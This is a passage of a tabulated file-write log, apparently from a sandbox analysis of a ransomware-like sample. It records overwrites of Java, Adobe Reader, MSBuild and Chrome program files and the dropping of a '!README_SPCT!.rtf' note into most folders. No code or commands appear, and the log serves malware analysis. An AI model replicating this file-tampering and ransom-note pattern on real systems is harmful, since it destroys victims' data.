| Write | C:\Program Files\Java\jre1.8.0_131\bin\klist.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\klist.exe | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\redact_poster.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\redact_poster.jpg | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\organize_poster.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\organize_poster.jpg | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\!README_SPCT!.rtf | size = 2573 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\!README_SPCT!.rtf | size = 2573 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\!README_SPCT!.rtf | size = 2573 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\!README_SPCT!.rtf | size = 2573 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\!README_SPCT!.rtf | size = 2573 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\!README_SPCT!.rtf | size = 2573 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\ktab.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\ktab.exe | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\redact_poster2x.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\ssvagent.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\!README_SPCT!.rtf | size = 2573 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\!README_SPCT!.rtf | size = 2573 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\ssvagent.exe | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\redact_poster2x.jpg | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\scan_poster2x.jpg | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\jabswitch.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\jabswitch.exe | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\scan_poster.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\scan_poster.jpg | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\optimize_poster2x.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\optimize_poster2x.jpg | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\javaw.exe | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\javaw.exe | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\cmm\GRAY.pf | size = 2048 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\combine_poster2x.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\combine_poster2x.jpg | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\organize_poster.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\organize_poster.jpg | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_it.properties | size = 4639 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\Words.pdf | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\Words.pdf | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\kinit.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\kinit.exe | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\protect_poster2x.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\protect_poster2x.jpg | size = 16384 |
|
1 | |
| Write | C:\Program Files\desktop.ini | size = 1590 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\servertool.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\compare_poster2x.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\splash_11-lic.gif | size = 9221 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\compare_poster2x.jpg | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\servertool.exe | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\javaws.exe | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\javaws.exe | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\javacpl.cpl | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\javacpl.cpl | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\redact_poster.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\redact_poster.jpg | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\cmm\CIEXYZ.pf | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\cmm\CIEXYZ.pf | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\rmid.exe | size = 5512 |
|
2 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\rmid.exe | size = 4096 |
|
2 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_fr.properties | size = 4825 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\amd64\jvm.cfg | size = 2050 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\nashorn.jar | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\cmm\LINEAR_RGB.pf | size = 2460 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\server\Xusage.txt | size = 2839 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\policytool.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\nashorn.jar | size = 61440 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\nashorn.jar | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\policytool.exe | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\accessibility.properties | size = 1565 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\splash@2x.gif | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\splash@2x.gif | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\unpack200.exe | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\unpack200.exe | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\currency.data | size = 5538 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_ja.properties | size = 7765 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\content-types.properties | size = 6964 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_zh_CN.properties | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_zh_CN.properties | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\cmm\PYCC.pf | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\cmm\PYCC.pf | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_zh_CN.properties | size = 5488 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_ko.properties | size = 7128 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\cmm\PYCC.pf | size = 4825 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_es.properties | size = 5016 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\optimize_poster.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\optimize_poster.jpg | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\splash_11@2x-lic.gif | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\splash_11@2x-lic.gif | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\splash.gif | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\splash.gif | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\dummy\adobe-old-logo.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\dummy\adobe-old-logo.jpg | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\javacpl.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\javacpl.exe | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\pack200.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\pack200.exe | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\meta-index | size = 2877 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\COPYRIGHT | size = 4660 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaBrightDemiBold.ttf | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaBrightDemiBold.ttf | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\invalid32x32.gif | size = 1569 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\localedata.jar | size = 17800 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\localedata.jar | size = 61440 |
|
2 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\localedata.jar | size = 8192 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\cldrdata.jar | size = 17800 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\cldrdata.jar | size = 61440 |
|
2 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\cldrdata.jar | size = 8192 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\sunec.jar | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\sunec.jar | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\dnsns.jar | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\dnsns.jar | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\zipfs.jar | size = 5512 |
|
2 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\zipfs.jar | size = 16384 |
|
2 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy.jar | size = 17800 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy.jar | size = 61440 |
|
2 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy.jar | size = 8192 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\cmm\sRGB.pf | size = 4560 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\win32_CopyNoDrop32x32.gif | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\win32_CopyNoDrop32x32.gif | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_pt_BR.properties | size = 4701 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\win32_CopyDrop32x32.gif | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\win32_CopyDrop32x32.gif | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\win32_CopyDrop32x32.gif | size = 1581 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\win32_CopyNoDrop32x32.gif | size = 1569 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\jfr\profile.jfc | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\access-bridge-64.jar | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\sunpkcs11.jar | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\sunpkcs11.jar | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\management\snmp.acl.template | size = 4792 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fontconfig.properties.src | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fontconfig.properties.src | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\access-bridge-64.jar | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\jfr\profile.jfc | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\security\blacklisted.certs | size = 2669 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\cursors.properties | size = 2696 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\LICENSE | size = 1456 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\management-agent.jar | size = 1797 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaTypewriterBold.ttf | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaTypewriterBold.ttf | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\jce.jar | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\jce.jar | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\win32_MoveNoDrop32x32.gif | size = 1569 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\logging.properties | size = 3871 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\management\management.properties | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\management\management.properties | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaSansRegular.ttf | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaSansRegular.ttf | size = 61440 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaSansRegular.ttf | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\security\blacklist | size = 5470 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\sunmscapi.jar | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\sunmscapi.jar | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\win32_MoveDrop32x32.gif | size = 1563 |
|
1 | |
| Write | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.VisualBasic.Targets | size = 6598 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Comments.aapp | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Comments.aapp | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaSansDemiBold.ttf | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaSansDemiBold.ttf | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\jvm.hprof.txt | size = 5642 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Comments.aapp | size = 5140 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Home.aapp | size = 1771 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\psfont.properties.ja | size = 4212 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\win32_LinkNoDrop32x32.gif | size = 1569 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Viewer.aapp | size = 4442 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\AppCenter_R.aapp | size = 4943 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Viewer.aapp | size = 1715 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\Welcome.html | size = 2371 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\Welcome.html | size = 1710 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Edit_R_RHP.aapp | size = 1817 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\jsse.jar | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\jsse.jar | size = 61440 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\jsse.jar | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Redact_R_RHP.aapp | size = 1819 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Edit_R_Full.aapp | size = 1818 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Adobe.Reader.Dependencies.manifest | size = 3225 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\!README_SPCT!.rtf | size = 2573 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\!README_SPCT!.rtf | size = 2573 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\dummy\!README_SPCT!.rtf | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\dummy\!README_SPCT!.rtf | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\dummy\!README_SPCT!.rtf | size = 2573 |
|
1 | |
| Write | C:\Program Files\!README_SPCT!.rtf | size = 2573 |
|
1 | |
| Write | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.Targets | size = 9608 |
|
1 | |
| Write | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.Targets | size = 61440 |
|
1 | |
| Write | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.Targets | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\sunjce_provider.jar | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\sunjce_provider.jar | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\meta-index | size = 3542 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\security\java.policy | size = 3882 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\release | size = 1944 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\!README_SPCT!.rtf | size = 2573 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\server\!README_SPCT!.rtf | size = 2573 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\!README_SPCT!.rtf | size = 2573 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\amd64\!README_SPCT!.rtf | size = 2573 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\cmm\!README_SPCT!.rtf | size = 2573 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaBrightRegular.ttf | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaBrightRegular.ttf | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\deploy\!README_SPCT!.rtf | size = 2573 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\ext\!README_SPCT!.rtf | size = 2573 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\fonts\!README_SPCT!.rtf | size = 2573 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\!README_SPCT!.rtf | size = 2573 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\plugin.jar | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\plugin.jar | size = 61440 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\plugin.jar | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\win32_LinkDrop32x32.gif | size = 1584 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\jfr\!README_SPCT!.rtf | size = 2573 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\management\!README_SPCT!.rtf | size = 2573 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\security\!README_SPCT!.rtf | size = 2573 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Protect_R_RHP.aapp | size = 1858 |
|
1 | |
| Write | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\!README_SPCT!.rtf | size = 2573 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\jfxswt.jar | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\jfxswt.jar | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Combine_R_RHP.aapp | size = 1828 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\net.properties | size = 5880 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Legal\ENU\license.html | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Legal\ENU\license.html | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\FillSign.aapp | size = 4101 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\TrackedSend.aapp | size = 1802 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\security\cacerts | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\security\cacerts | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | size = 17800 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | size = 61440 |
|
2 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | size = 8192 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\README.txt | size = 1462 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Compare_R_RHP.aapp | size = 1853 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Measure.aapp | size = 2001 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\security\javaws.policy | size = 1514 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\MoreTools.aapp | size = 1764 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\cryptocme.sig | size = 4348 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Legal\ENU\eula.ini | size = 2456 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe | size = 32768 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\security\java.security | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\security\java.security | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\PMP\DataMatrix.pmp | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\PMP\DataMatrix.pmp | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Installer\chrome.7z | size = 34184 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Installer\chrome.7z | size = 61440 |
|
68 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Checkers.api | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Checkers.api | size = 61440 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Checkers.api | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Installer\chrome.7z | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\THIRDPARTYLICENSEREADME.txt | size = 9608 |
|
